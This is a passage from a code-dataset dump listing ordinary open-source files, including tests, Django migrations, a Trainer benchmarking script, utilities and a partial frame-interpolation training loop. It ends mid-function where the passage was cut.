max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
test/run/t398.py
|
timmartin/skulpt
| 2,671 |
127888
|
<filename>test/run/t398.py
print zip([8, 9, 10], [11, 12, 13])
print zip([1, 2, 3])
print zip()
print zip([])
|
tests/test_project/app_rename_column/migrations/0002_auto_20190414_1502.py
|
christianbundy/django-migration-linter
| 357 |
127950
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-04-14 15:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("app_rename_column", "0001_initial")]
operations = [
migrations.RenameField(model_name="a", old_name="field", new_name="renamed")
]
|
scripts/benchmark/trainer-benchmark.py
|
bugface/transformers
| 8,028 |
127961
|
<reponame>bugface/transformers
#!/usr/bin/env python
# HF Trainer benchmarking tool
#
# This tool can be used to run and compare multiple dimensions of the HF Trainers args.
#
# It then prints a report once in github format with all the information that needs to be shared
# with others and second time in a console-friendly format, so it's easier to use for tuning things up.
#
# The main idea is:
#
# ./trainer-benchmark.py --base-cmd '<cmd args that don't change>' \
# --variations '--tf32 0|--tf32 1' '--fp16 0|--fp16 1|--bf16 1' \
# --target-metric-key train_samples_per_second
#
# The variations can be any command line argument that you want to compare and not just dtype as in
# the example.
#
# --variations allows you to compare variations in multiple dimensions.
#
# as the first dimention has 2 options and the second 3 in our example, this will run the trainer 6
# times adding one of:
#
# 1. --tf32 0 --fp16 0
# 2. --tf32 0 --fp16 1
# 3. --tf32 0 --bf16 1
# 4. --tf32 1 --fp16 0
# 5. --tf32 1 --fp16 1
# 6. --tf32 1 --bf16 1
#
# and print the results. This is just a cartesian product - and more than 2 dimensions can be used.
#
# If you want to rely on defaults, this:
# --variations '--tf32 0|--tf32 1' '--fp16 0|--fp16 1|--bf16 1'
# is identical to this:
# --variations '--tf32 0|--tf32 1' '|--fp16|--bf16'
#
# the leading empty variation in the 2nd dimension is a valid variation.
#
# So here we get the following 6 variations:
#
# 1. --tf32 0
# 2. --tf32 0 --fp16
# 3. --tf32 0 --bf16
# 4. --tf32 1
# 5. --tf32 1 --fp16
# 6. --tf32 1 --bf16
#
# In this particular case we don't know what the default tf32 setting is as it's normally
# pytorch-version dependent). That's why it's best to do an explicit setting of each variation:
# `--tf32 0|--tf32 1`
#
# Here is a full example of a train:
#
# CUDA_VISIBLE_DEVICES=0 python ./scripts/benchmark/trainer-benchmark.py \
# --base-cmd \
# ' examples/pytorch/translation/run_translation.py --model_name_or_path t5-small \
# --output_dir output_dir --do_train --label_smoothing 0.1 --logging_strategy no \
# --save_strategy no --per_device_train_batch_size 32 --max_source_length 512 \
# --max_target_length 512 --num_train_epochs 1 --overwrite_output_dir \
# --source_lang en --target_lang ro --dataset_name wmt16 --dataset_config "ro-en" \
# --source_prefix "translate English to Romanian: " --warmup_steps 50 \
# --max_train_samples 20000 --dataloader_num_workers 2 ' \
# --target-metric-key train_samples_per_second --repeat-times 1 --variations \
# '|--fp16|--bf16' '--tf32 0|--tf32 1' --report-metric-keys train_loss \
# --repeat-times 1 --base-variation '--tf32 0'
#
# and here is a possible output:
#
#
# | Variation | Train | Diff | Train |
# | | samples | % | loss |
# | | per | | |
# | | second | | |
# |:----------------|----------:|-------:|--------:|
# | --tf32 0 | 285.11 | 0 | 2.51 |
# | --tf32 1 | 342.09 | 20 | 2.51 |
# | --fp16 --tf32 0 | 423.49 | 49 | 2.51 |
# | --fp16 --tf32 1 | 423.13 | 48 | 2.51 |
# | --bf16 --tf32 0 | 416.80 | 46 | 2.52 |
# | --bf16 --tf32 1 | 415.87 | 46 | 2.52 |
#
#
# So you can quickly compare the different outcomes.
#
# Typically running each experiment once is enough, but if the environment is unstable you can
# re-run each multiple times, e.g., 3 using --repeat-times 3 and it will report the averaged results.
#
# By default it'll use the lowest result as the base line to use as 100% and then compare the rest to
# it as can be seen from the table above, but you can also specify which combination is the one to use as
# the baseline, e.g., to change to another entry use: --base-variation '--tf32 1 --fp16 0'
#
# --target-metric-key is there to tell the program which metrics to compare - the different metric keys are
# inside output_dir/all_results.json. e.g., to measure eval performance instead of train use:
# --target-metric-key eval_samples_per_second
# but of course you will need to adjust the --base-cmd value in the example to perform evaluation as
# well (as currently it doesn't)
#
import argparse
import datetime
import io
import itertools
import json
import math
import os
import platform
import re
import shlex
import subprocess
import sys
from pathlib import Path
from statistics import fmean
import pandas as pd
import torch
from tqdm import tqdm
import transformers
nan = float("nan")
class Tee:
"""
A helper class to tee print's output into a file.
Usage:
sys.stdout = Tee(filename)
"""
def __init__(self, filename):
self.stdout = sys.stdout
self.file = open(filename, "a")
def __getattr__(self, attr):
return getattr(self.stdout, attr)
def write(self, msg):
self.stdout.write(msg)
# strip tqdm codes
self.file.write(re.sub(r"^.*\r", "", msg, 0, re.M))
def get_original_command(max_width=80, full_python_path=False):
"""
Return the original command line string that can be replayed nicely and wrapped for 80 char width.
Args:
max_width (`int`, `optional`, defaults to 80):
The width to wrap for.
full_python_path (`bool`, `optional`, defaults to `False`):
Whether to replicate the full path or just the last segment (i.e. `python`).
"""
cmd = []
# deal with critical env vars
env_keys = ["CUDA_VISIBLE_DEVICES"]
for key in env_keys:
val = os.environ.get(key, None)
if val is not None:
cmd.append(f"{key}={val}")
# python executable (not always needed if the script is executable)
python = sys.executable if full_python_path else sys.executable.split("/")[-1]
cmd.append(python)
# now the normal args
cmd += list(map(shlex.quote, sys.argv))
# split up into up to MAX_WIDTH lines with shell multi-line escapes
lines = []
current_line = ""
while len(cmd) > 0:
current_line += f"{cmd.pop(0)} "
if len(cmd) == 0 or len(current_line) + len(cmd[0]) + 1 > max_width - 1:
lines.append(current_line)
current_line = ""
return "\\\n".join(lines)
def get_base_command(args, output_dir):
# unwrap multi-line input
args.base_cmd = re.sub(r"[\\\n]+", " ", args.base_cmd)
# remove --output_dir if any and set our own
args.base_cmd = re.sub("--output_dir\s+[^\s]+", "", args.base_cmd)
args.base_cmd += f" --output_dir {output_dir}"
# ensure we have --overwrite_output_dir
args.base_cmd = re.sub("--overwrite_output_dir\s+", "", args.base_cmd)
args.base_cmd += " --overwrite_output_dir"
return [sys.executable] + shlex.split(args.base_cmd)
def process_run_single(id, cmd, variation, output_dir, target_metric_key, metric_keys, verbose):
# Enable to debug everything but the run itself, to do it fast and see the progress.
# This is useful for debugging the output formatting quickly - we can remove it later once
# everybody is happy with the output
if 0:
import random
from time import sleep
sleep(0)
return dict(
{k: random.uniform(0, 100) for k in metric_keys},
**{target_metric_key: random.choice([nan, 10.31, 100.2, 55.6666, 222.22222222])},
)
result = subprocess.run(cmd, capture_output=True, text=True)
if verbose:
print("STDOUT", result.stdout)
print("STDERR", result.stderr)
# save the streams
prefix = variation.replace(" ", "-")
with open(Path(output_dir) / f"log.{prefix}.stdout.txt", "w") as f:
f.write(result.stdout)
with open(Path(output_dir) / f"log.{prefix}.stderr.txt", "w") as f:
f.write(result.stderr)
if result.returncode != 0:
if verbose:
print("failed")
return {target_metric_key: nan}
with io.open(f"{output_dir}/all_results.json", "r", encoding="utf-8") as f:
metrics = json.load(f)
# filter out just the keys we want
return {k: v for k, v in metrics.items() if k in metric_keys}
def process_run(
id,
cmd,
variation_key,
variation,
longest_variation_len,
target_metric_key,
report_metric_keys,
repeat_times,
output_dir,
verbose,
):
results = []
metrics = []
preamble = f"{id}: {variation:<{longest_variation_len}}"
outcome = f"{preamble}: "
metric_keys = set(report_metric_keys + [target_metric_key])
for i in tqdm(range(repeat_times), desc=preamble, leave=False):
single_run_metrics = process_run_single(
id, cmd, variation, output_dir, target_metric_key, metric_keys, verbose
)
result = single_run_metrics[target_metric_key]
if not math.isnan(result):
metrics.append(single_run_metrics)
results.append(result)
outcome += "✓"
else:
outcome += "✘"
outcome = f"\33[2K\r{outcome}"
if len(metrics) > 0:
mean_metrics = {k: fmean([x[k] for x in metrics]) for k in metrics[0].keys()}
mean_target = round(mean_metrics[target_metric_key], 2)
results_str = f"{outcome} {mean_target}"
if len(metrics) > 1:
results_str += f" {tuple(round(x, 2) for x in results)}"
print(results_str)
mean_metrics[variation_key] = variation
return mean_metrics
else:
print(outcome)
return {variation_key: variation, target_metric_key: nan}
def get_versions():
properties = torch.cuda.get_device_properties(torch.device("cuda"))
return f"""
Datetime : {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
Software:
transformers: {transformers.__version__}
torch : {torch.__version__}
cuda : {torch.version.cuda}
python : {platform.python_version()}
Hardware:
{torch.cuda.device_count()} GPUs : {properties.name}, {properties.total_memory/2**30:0.2f}GB
"""
def process_results(results, target_metric_key, report_metric_keys, base_variation, output_dir):
df = pd.DataFrame(results)
variation_key = "variation"
diff_key = "diff_%"
sentinel_value = nan
if base_variation is not None and len(df[df[variation_key] == base_variation]):
# this may still return nan
sentinel_value = df.loc[df[variation_key] == base_variation][target_metric_key].item()
if math.isnan(sentinel_value):
# as a fallback, use the minimal value as the sentinel
sentinel_value = df.loc[df[target_metric_key] != nan][target_metric_key].min()
# create diff column if possible
if not math.isnan(sentinel_value):
df[diff_key] = df.apply(
lambda r: round(100 * (r[target_metric_key] - sentinel_value) / sentinel_value)
if not math.isnan(r[target_metric_key])
else 0,
axis="columns",
)
# re-order columns
cols = [variation_key, target_metric_key, diff_key, *report_metric_keys]
df = df.reindex(cols, axis="columns") # reorder cols
# capitalize
df = df.rename(str.capitalize, axis="columns")
# make the cols as narrow as possible
df_github = df.rename(lambda c: c.replace("_", "<br>"), axis="columns")
df_console = df.rename(lambda c: c.replace("_", "\n"), axis="columns")
report = ["", "Copy between the cut-here-lines and paste as is to github or a forum"]
report += ["----------8<-----------------8<--------"]
report += ["*** Results:", df_github.to_markdown(index=False, floatfmt=".2f")]
report += ["```"]
report += ["*** Setup:", get_versions()]
report += ["*** The benchmark command line was:", get_original_command()]
report += ["```"]
report += ["----------8<-----------------8<--------"]
report += ["*** Results (console):", df_console.to_markdown(index=False, floatfmt=".2f")]
print("\n\n".join(report))
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--base-cmd",
default=None,
type=str,
required=True,
help="Base cmd",
)
parser.add_argument(
"--variations",
default=None,
type=str,
nargs="+",
required=True,
help="Multi-dimensional variations, example: '|--fp16|--bf16' '|--tf32'",
)
parser.add_argument(
"--base-variation",
default=None,
type=str,
help="Baseline variation to compare to. if None the minimal target value will be used to compare against",
)
parser.add_argument(
"--target-metric-key",
default=None,
type=str,
required=True,
help="Target metric key in output_dir/all_results.json, e.g., train_samples_per_second",
)
parser.add_argument(
"--report-metric-keys",
default="",
type=str,
help="Report metric keys - other metric keys from output_dir/all_results.json to report, e.g., train_loss. Use a single argument e.g., 'train_loss train_samples",
)
parser.add_argument(
"--repeat-times",
default=1,
type=int,
help="How many times to re-run each variation - an average will be reported",
)
parser.add_argument(
"--output_dir",
default="output_benchmark",
type=str,
help="The output directory where all the benchmark reports will go to and additionally this directory will be used to override --output_dir in the script that is being benchmarked",
)
parser.add_argument(
"--verbose",
default=False,
action="store_true",
help="Whether to show the outputs of each run or just the benchmark progress",
)
args = parser.parse_args()
output_dir = args.output_dir
Path(output_dir).mkdir(exist_ok=True)
base_cmd = get_base_command(args, output_dir)
# split each dimension into its --foo variations
dims = [list(map(str.strip, re.split(r"\|", x))) for x in args.variations]
# build a cartesian product of dimensions and convert those back into cmd-line arg strings,
# while stripping white space for inputs that were empty
variations = list(map(str.strip, map(" ".join, itertools.product(*dims))))
longest_variation_len = max(len(x) for x in variations)
# split wanted keys
report_metric_keys = args.report_metric_keys.split()
# capture prints into a log file for convenience
report_fn = f"benchmark-report-{datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt"
print(f"\nNote: each run's output is also logged under {output_dir}/log.*.std*.txt")
print(f"and this script's output is also piped into {report_fn}")
sys.stdout = Tee(report_fn)
print(f"\n*** Running {len(variations)} benchmarks:")
print(f"Base command: {' '.join(base_cmd)}")
variation_key = "variation"
results = []
for id, variation in enumerate(tqdm(variations, desc="Total completion: ", leave=False)):
cmd = base_cmd + variation.split()
results.append(
process_run(
id + 1,
cmd,
variation_key,
variation,
longest_variation_len,
args.target_metric_key,
report_metric_keys,
args.repeat_times,
output_dir,
args.verbose,
)
)
process_results(results, args.target_metric_key, report_metric_keys, args.base_variation, output_dir)
if __name__ == "__main__":
main()
|
tests/integration/test_archive_per_month.py
|
asmeurer/nikola
| 1,901 |
128017
|
<gh_stars>1000+
"""Check that the monthly archives build and are correct."""
import os
import pytest
from nikola import __main__
from .helper import cd, patch_config
from .test_demo_build import prepare_demo_site
from .test_empty_build import ( # NOQA
test_archive_exists,
test_avoid_double_slash_in_rss,
test_check_files,
test_check_links,
test_index_in_sitemap,
)
def test_monthly_archive(build, output_dir):
"""Check that the monthly archive is build."""
assert os.path.isfile(os.path.join(output_dir, "2012", "03", "index.html"))
@pytest.fixture(scope="module")
def build(target_dir):
"""Fill the site with demo content and build it."""
prepare_demo_site(target_dir)
patch_config(
target_dir,
("# CREATE_MONTHLY_ARCHIVE = False", "CREATE_MONTHLY_ARCHIVE = True"),
)
with cd(target_dir):
__main__.main(["build"])
|
src/exabgp/configuration/core/location.py
|
pierky/exabgp
| 1,560 |
128037
|
<gh_stars>1000+
# encoding: utf-8
"""
location.py
Created by <NAME> on 2014-06-22.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
# ===================================================================== Location
# file location
class Location(object):
def __init__(self, index_line=0, index_column=0, line=''):
self.line = line
self.index_line = index_line
self.index_column = index_column
def clear(self):
self.index_line = 0
self.index_column = 0
self.line = ''
class Error(Exception):
tabsize = 3
syntax = ''
def __init__(self, location, message, syntax=''):
self.line = location.line.replace('\t', ' ' * self.tabsize)
self.index_line = location.index_line
self.index_column = location.index_column + (self.tabsize - 1) * location.line[: location.index_column].count(
'\t'
)
self.message = '\n\n'.join(
(
'problem parsing configuration file line %d position %d'
% (location.index_line, location.index_column + 1),
'error message: %s' % message.replace('\t', ' ' * self.tabsize),
'%s%s' % (self.line, '-' * self.index_column + '^'),
)
)
# allow to give the right syntax in using Raised
if syntax:
self.message += '\n\n' + syntax
Exception.__init__(self)
def __repr__(self):
return self.message
|
aiogoogle/utils.py
|
BebopChrome/aiogoogle
| 115 |
128057
|
__all__ = []
import datetime
import re
def _safe_getitem(dct, *keys):
for key in keys:
try:
dct = dct[key]
except (KeyError):
return None
return dct
class _dict(dict): # pragma: no cover
""" A simple dict subclass for use with Creds modelling. No surprises """
def __init__(self, *args, **kwargs): # pragma: no cover
super(_dict, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr): # pragma: no cover
return self.get(attr)
def __setattr__(self, key, value): # pragma: no cover
self.__setitem__(key, value)
def __setitem__(self, key, value): # pragma: no cover
super(_dict, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item): # pragma: no cover
self.__delitem__(item)
def __delitem__(self, key): # pragma: no cover
super(_dict, self).__delitem__(key)
del self.__dict__[key]
def _parse_time_components(tstr):
# supported format is HH[:MM[:SS[.fff[fff]]]]
if len(tstr) < 2:
raise ValueError("Invalid Isotime format")
hh = tstr[:2]
mm_ss = re.findall(r":(\d{2})", tstr)
ff = re.findall(r"\.(\d+)", tstr)
if ff and not len(ff[0]) in [3, 6]:
raise ValueError("Invalid Isotime format")
ff = ff[0] if ff else []
# ensure tstr was valid
if len(mm_ss) < 2 and ff:
raise ValueError("Invalid Isotime format")
parsed_str = hh + (":" + ":".join(mm_ss) if mm_ss else "") + \
("." + ff if ff else "")
if parsed_str != tstr:
raise ValueError("Invalid Isotime format")
components = [int(hh)]
if mm_ss:
components.extend(int(t) for t in mm_ss)
if ff:
components.append(int(ff.ljust(6, "0")))
return components + [0] * (4 - len(components))
def _parse_isoformat(dtstr):
# supported format is YYYY-mm-dd[THH[:MM[:SS[.fff[fff]]]]][+HH:MM[:SS[.ffffff]]]
dstr = dtstr[:10]
tstr = dtstr[11:]
try:
date = datetime.datetime.strptime(dstr, "%Y-%m-%d")
except ValueError as e:
raise ValueError("Invalid Isotime format") from e
if tstr:
# check for time zone
tz_pos = (tstr.find("-") + 1 or tstr.find("+") + 1)
if tz_pos > 0:
tzsign = -1 if tstr[tz_pos - 1] == "-" else 1
tz_comps = _parse_time_components(tstr[tz_pos:])
tz = tzsign * datetime.timedelta(
hours=tz_comps[0], minutes=tz_comps[1],
seconds=tz_comps[2], microseconds=tz_comps[3])
tstr = tstr[:tz_pos - 1]
else:
tz = datetime.timedelta(0)
time_comps = _parse_time_components(tstr)
date = date.replace(hour=time_comps[0], minute=time_comps[1],
second=time_comps[2], microsecond=time_comps[3])
date -= tz
elif len(dtstr) == 11:
raise ValueError("Invalid Isotime format")
return date
|
historian/cli/db.py
|
bit0fun/plugins
| 173 |
128072
|
<reponame>bit0fun/plugins
import click
from common import NodeAnnouncement, ChannelAnnouncement, ChannelUpdate
from tqdm import tqdm
from gossipd import parse
from cli.common import db_session, default_db
@click.group()
def db():
pass
@db.command()
@click.argument('source', type=str)
@click.argument('destination', type=str, default=default_db)
def merge(source, destination):
"""Merge two historian databases by copying from source to destination.
"""
meta = {
'channel_announcements': None,
'channel_updates': None,
'node_announcements': None,
}
with db_session(source) as source, db_session(destination) as target:
# Not strictly necessary, but I like progress indicators and ETAs.
for table in meta.keys():
rows = source.execute(f"SELECT count(*) FROM {table}")
count, = rows.next()
meta[table] = count
for r, in tqdm(
source.execute("SELECT raw FROM channel_announcements"),
total=meta['channel_announcements'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(ChannelAnnouncement.from_gossip(msg, r))
for r, in tqdm(
source.execute("SELECT raw FROM channel_updates ORDER BY timestamp ASC"),
total=meta['channel_updates'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(ChannelUpdate.from_gossip(msg, r))
for r, in tqdm(
source.execute("SELECT raw FROM node_announcements ORDER BY timestamp ASC"),
total=meta['node_announcements'],
):
msg = parse(r)
if isinstance(r, memoryview):
r = bytes(r)
target.merge(NodeAnnouncement.from_gossip(msg, r))
target.commit()
|
src/modeling/bert/__init__.py
|
microsoft/MeshGraphormer
| 135 |
128106
|
__version__ = "1.0.0"
from .modeling_bert import (BertConfig, BertModel,
load_tf_weights_in_bert, BERT_PRETRAINED_MODEL_ARCHIVE_MAP,
BERT_PRETRAINED_CONFIG_ARCHIVE_MAP)
from .modeling_graphormer import Graphormer
from .e2e_body_network import Graphormer_Body_Network
from .e2e_hand_network import Graphormer_Hand_Network
from .modeling_utils import (WEIGHTS_NAME, CONFIG_NAME, TF_WEIGHTS_NAME,
PretrainedConfig, PreTrainedModel, prune_layer, Conv1D)
from .file_utils import (PYTORCH_PRETRAINED_BERT_CACHE, cached_path)
|
src/lib/pdb.py
|
DTenore/skulpt
| 2,671 |
128113
|
<reponame>DTenore/skulpt<filename>src/lib/pdb.py<gh_stars>1000+
import _sk_fail; _sk_fail._("pdb")
|
api/anomaly/migrations/0017_merge_20210810_0524.py
|
LeiSoft/CueObserve
| 149 |
128122
|
# Generated by Django 3.2.1 on 2021-08-10 05:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anomaly', '0015_merge_20210806_0248'),
('anomaly', '0016_merge_20210806_1138'),
]
operations = [
]
|
securityheaders/checkers/csp/test_srchttp.py
|
th3cyb3rc0p/securityheaders
| 151 |
128143
|
<reponame>th3cyb3rc0p/securityheaders
import unittest
from securityheaders.checkers.csp import CSPSCRHTTPChecker, CSPReportOnlySCRHTTPChecker
class HTTPTest(unittest.TestCase):
def setUp(self):
self.x = CSPSCRHTTPChecker()
self.y = CSPReportOnlySCRHTTPChecker()
def test_checkNoCSP(self):
nox = dict()
nox['test'] = 'value'
self.assertEqual(self.x.check(nox), [])
def test_checkNone(self):
nonex = None
self.assertEqual(self.x.check(nonex), [])
def test_NoneCSP(self):
hasx = dict()
hasx['content-security-policy'] = None
self.assertEqual(self.x.check(hasx), [])
def test_HTTPURI(self):
hasx3 = dict()
hasx3['content-security-policy'] = "report-uri http://foo.bar/csp"
result = self.x.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_HTTPSURI(self):
hasx4 = dict()
hasx4['content-security-policy'] = "report-uri https://foo.bar/csp"
self.assertEqual(self.x.check(hasx4), [])
def test_HTTPURIRO(self):
hasx3 = dict()
hasx3['content-security-policy-report-only'] = "report-uri http://foo.bar/csp"
result = self.y.check(hasx3)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
def test_HTTPSURIRO(self):
hasx4 = dict()
hasx4['content-security-policy-report-only'] = "report-uri https://foo.bar/csp"
self.assertEqual(self.y.check(hasx4), [])
def test_NoURI(self):
hasx2 = dict()
hasx2['content-security-policy'] = "default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'"
self.assertEqual(self.x.check(hasx2), [])
if __name__ == '__main__':
unittest.main()
|
tests/basics/async_with_break.py
|
sebastien-riou/micropython
| 13,648 |
128190
|
# test async with, escaped by a break
class AContext:
async def __aenter__(self):
print('enter')
return 1
async def __aexit__(self, exc_type, exc, tb):
print('exit', exc_type, exc)
async def f1():
while 1:
async with AContext():
print('body')
break
print('no 1')
print('no 2')
o = f1()
try:
print(o.send(None))
except StopIteration:
print('finished')
async def f2():
while 1:
try:
async with AContext():
print('body')
break
print('no 1')
finally:
print('finally')
print('no 2')
o = f2()
try:
print(o.send(None))
except StopIteration:
print('finished')
async def f3():
while 1:
try:
try:
async with AContext():
print('body')
break
print('no 1')
finally:
print('finally inner')
finally:
print('finally outer')
print('no 2')
o = f3()
try:
print(o.send(None))
except StopIteration:
print('finished')
|
api/tests/opentrons/drivers/test_command_builder.py
|
anuwrag/opentrons
| 235 |
128202
|
<filename>api/tests/opentrons/drivers/test_command_builder.py
from typing import Optional
import pytest
from opentrons.drivers.command_builder import CommandBuilder
def test_builder_create_command_with_terminator() -> None:
"""It should create a command with terminator."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.build() == "terminator"
@pytest.mark.parametrize(
argnames=["value", "precision", "expected_float"],
argvalues=[
[1.2342, 3, 1.234],
[1.2342, None, 1.2342],
[1.2342, 0, 1.0],
],
)
def test_builder_create_command_add_float(
value: float, precision: Optional[int], expected_float: float
) -> None:
"""It should create a command with a floating point value."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert (
builder.add_float(prefix="Z", value=value, precision=precision).build()
== f"Z{expected_float} terminator"
)
def test_builder_create_command_add_int() -> None:
"""It should create a command with an integer point value."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_int(prefix="Z", value=15).build() == f"Z15 {terminator}"
def test_builder_create_command_add_gcode() -> None:
"""It should create a command with a GCODE."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_gcode(gcode="G321").build() == f"G321 {terminator}"
def test_builder_create_command_add_builder() -> None:
"""It should create a command words in another builder."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert builder.add_gcode(gcode="G321").build() == f"G321 {terminator}"
builder2 = CommandBuilder(terminator=terminator)
assert (
builder2.add_builder(builder=builder)
.add_gcode(gcode="G123")
.add_builder(builder=builder)
.build()
== f"G321 G123 G321 {terminator}"
)
def test_builder_chain() -> None:
"""It should create a command using chaining."""
terminator = "terminator"
builder = CommandBuilder(terminator=terminator)
assert (
builder.add_gcode(gcode="G321")
.add_float(prefix="X", value=321, precision=3)
.add_gcode(gcode="M321")
.add_int(prefix="Z", value=3)
.add_gcode("G111")
.build()
== f"G321 X321 M321 Z3 G111 {terminator}"
)
|
training/train_lib.py
|
vsewall/frame-interpolation
| 521 |
128205
|
<reponame>vsewall/frame-interpolation
# Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training library for frame interpolation using distributed strategy."""
import functools
from typing import Any, Callable, Dict, Text, Tuple
from absl import logging
import tensorflow as tf
def _concat_tensors(tensors: tf.Tensor) -> tf.Tensor:
"""Concat tensors of the different replicas."""
return tf.concat(tf.nest.flatten(tensors, expand_composites=True), axis=0)
@tf.function
def _distributed_train_step(strategy: tf.distribute.Strategy,
batch: Dict[Text, tf.Tensor], model: tf.keras.Model,
loss_functions: Dict[Text,
Tuple[Callable[..., tf.Tensor],
Callable[...,
tf.Tensor]]],
optimizer: tf.keras.optimizers.Optimizer,
iterations: int) -> Dict[Text, Any]:
"""Distributed training step.
Args:
strategy: A Tensorflow distribution strategy.
batch: A batch of training examples.
model: The Keras model to train.
loss_functions: The list of Keras losses used to train the model.
optimizer: The Keras optimizer used to train the model.
iterations: Iteration number used to sample weights to each loss.
Returns:
A dictionary of train step outputs.
"""
def _train_step(batch: Dict[Text, tf.Tensor]) -> Dict[Text, tf.Tensor]:
"""Train for one step."""
with tf.GradientTape() as tape:
predictions = model(batch, training=True)
losses = []
for (loss_value, loss_weight) in loss_functions.values():
losses.append(loss_value(batch, predictions) * loss_weight(iterations))
loss = tf.add_n(losses)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
# post process for visualization
all_data = {'loss': loss}
all_data.update(batch)
all_data.update(predictions)
return all_data
step_outputs = strategy.run(_train_step, args=(batch,))
loss = strategy.reduce(
tf.distribute.ReduceOp.MEAN, step_outputs['loss'], axis=None)
x0 = _concat_tensors(step_outputs['x0'])
x1 = _concat_tensors(step_outputs['x1'])
y = _concat_tensors(step_outputs['y'])
pred_y = _concat_tensors(step_outputs['image'])
scalar_summaries = {'training_loss': loss}
image_summaries = {
'x0': x0,
'x1': x1,
'y': y,
'pred_y': pred_y
}
extra_images = {
'importance0', 'importance1', 'x0_warped', 'x1_warped', 'fg_image',
'bg_image', 'fg_alpha', 'x1_unfiltered_warped'
}
for image in extra_images:
if image in step_outputs:
image_summaries[image] = _concat_tensors(step_outputs[image])
return {
'loss': loss,
'scalar_summaries': scalar_summaries,
'image_summaries': {
f'training/{name}': value for name, value in image_summaries.items()
}
}
def _summary_writer(summaries_dict: Dict[Text, Any]) -> None:
"""Adds scalar and image summaries."""
# Adds scalar summaries.
for key, scalars in summaries_dict['scalar_summaries'].items():
tf.summary.scalar(key, scalars)
# Adds image summaries.
for key, images in summaries_dict['image_summaries'].items():
tf.summary.image(key, tf.clip_by_value(images, 0.0, 1.0))
tf.summary.histogram(key + '_h', images)
def train_loop(
strategy: tf.distribute.Strategy,
train_set: tf.data.Dataset,
create_model_fn: Callable[..., tf.keras.Model],
create_losses_fn: Callable[..., Dict[str, Tuple[Callable[..., tf.Tensor],
Callable[..., tf.Tensor]]]],
create_optimizer_fn: Callable[..., tf.keras.optimizers.Optimizer],
distributed_train_step_fn: Callable[[
tf.distribute.Strategy, Dict[str, tf.Tensor], tf.keras.Model, Dict[
str,
Tuple[Callable[..., tf.Tensor],
Callable[..., tf.Tensor]]], tf.keras.optimizers.Optimizer, int
], Dict[str, Any]],
eval_loop_fn: Callable[..., None],
create_metrics_fn: Callable[..., Dict[str, tf.keras.metrics.Metric]],
eval_folder: Dict[str, Any],
eval_datasets: Dict[str, tf.data.Dataset],
summary_writer_fn: Callable[[Dict[str, Any]], None],
train_folder: str,
saved_model_folder: str,
num_iterations: int,
save_summaries_frequency: int = 500,
save_checkpoint_frequency: int = 500,
checkpoint_max_to_keep: int = 10,
checkpoint_save_every_n_hours: float = 2.,
timing_frequency: int = 100,
logging_frequency: int = 10):
"""A Tensorflow 2 eager mode training loop.
Args:
strategy: A Tensorflow distributed strategy.
train_set: A tf.data.Dataset to loop through for training.
create_model_fn: A callable that returns a tf.keras.Model.
create_losses_fn: A callable that returns a tf.keras.losses.Loss.
create_optimizer_fn: A callable that returns a
tf.keras.optimizers.Optimizer.
distributed_train_step_fn: A callable that takes a distribution strategy, a
Dict[Text, tf.Tensor] holding the batch of training data, a
tf.keras.Model, a tf.keras.losses.Loss, a tf.keras.optimizers.Optimizer,
iteartion number to sample a weight value to loos functions,
and returns a dictionary to be passed to the summary_writer_fn.
eval_loop_fn: Eval loop function.
create_metrics_fn: create_metric_fn.
eval_folder: A path to where the summary event files and checkpoints will be
saved.
eval_datasets: A dictionary of evalution tf.data.Dataset to loop through for
evaluation.
summary_writer_fn: A callable that takes the output of
distributed_train_step_fn and writes summaries to be visualized in
TensorBoard.
train_folder: A path to where the summaries event files and checkpoints
will be saved.
saved_model_folder: A path to where the saved models are stored.
num_iterations: An integer, the number of iterations to train for.
save_summaries_frequency: The iteration frequency with which summaries are
saved.
save_checkpoint_frequency: The iteration frequency with which model
checkpoints are saved.
checkpoint_max_to_keep: The maximum number of checkpoints to keep.
checkpoint_save_every_n_hours: The frequency in hours to keep checkpoints.
timing_frequency: The iteration frequency with which to log timing.
logging_frequency: How often to output with logging.info().
"""
logging.info('Creating training tensorboard summaries ...')
summary_writer = tf.summary.create_file_writer(train_folder)
if eval_datasets is not None:
logging.info('Creating eval tensorboard summaries ...')
eval_summary_writer = tf.summary.create_file_writer(eval_folder)
train_set = strategy.experimental_distribute_dataset(train_set)
with strategy.scope():
logging.info('Building model ...')
model = create_model_fn()
loss_functions = create_losses_fn()
optimizer = create_optimizer_fn()
if eval_datasets is not None:
